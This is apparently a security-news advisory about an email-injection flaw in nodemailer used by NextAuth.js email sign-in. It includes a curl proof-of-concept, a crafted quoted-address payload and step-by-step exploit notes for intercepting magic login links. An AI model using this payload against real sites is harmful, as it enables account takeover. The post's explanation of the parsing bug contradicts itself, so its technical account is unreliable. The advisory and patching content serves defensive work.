Listen to this Post
The vulnerability exploits a parsing flaw in the nodemailer library used by NextAuth.js for email-based authentication. When a user initiates a sign-in, the application sends a verification email containing a magic link. The recipient email address is processed by nodemailer’s address parser. A malicious actor can supply a crafted email string, such as "[email protected]"@victim.com. Due to the bug, nodemailer incorrectly interprets this address. Instead of treating the entire string as the recipient address (which would be invalid and likely bounce), it extracts only the local part within the quotes and the domain immediately following the `@` symbol. Consequently, the authentication email is delivered to `[email protected]` (an attacker-controlled inbox) rather than failing or being sent to the intended `victim.com` domain. This allows the attacker to intercept the login link, gain unauthorized access to the victim’s account, and potentially compromise other sensitive communications.
Platform: NextAuth.js
Version: <=4.24.11, 5.0.0-beta.29
Vulnerability: Email Injection
Severity: Critical
date: 2024
Prediction: Patch expected Q4 2024
What Undercode Say:
curl -X POST http://localhost:3000/api/auth/signin/nodemailer \ -H "Content-Type: application/x-www-form-urlencoded" \ -d 'email=%22attack%40evil.com%22%40victim.com&csrfToken=abc123'
// Malicious sign-in attempt payload const maliciousEmail = '"[email protected]"@victim.com';
How Exploit:
Craft email payload.
Submit to sign-in endpoint.
Intercept verification email.
Hijack user account.
Protection from this CVE
Upgrade nodemailer dependency.
Implement email format validation.
Use allowlists for domains.
Impact:
Account takeover.
Information disclosure.
Privilege escalation.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
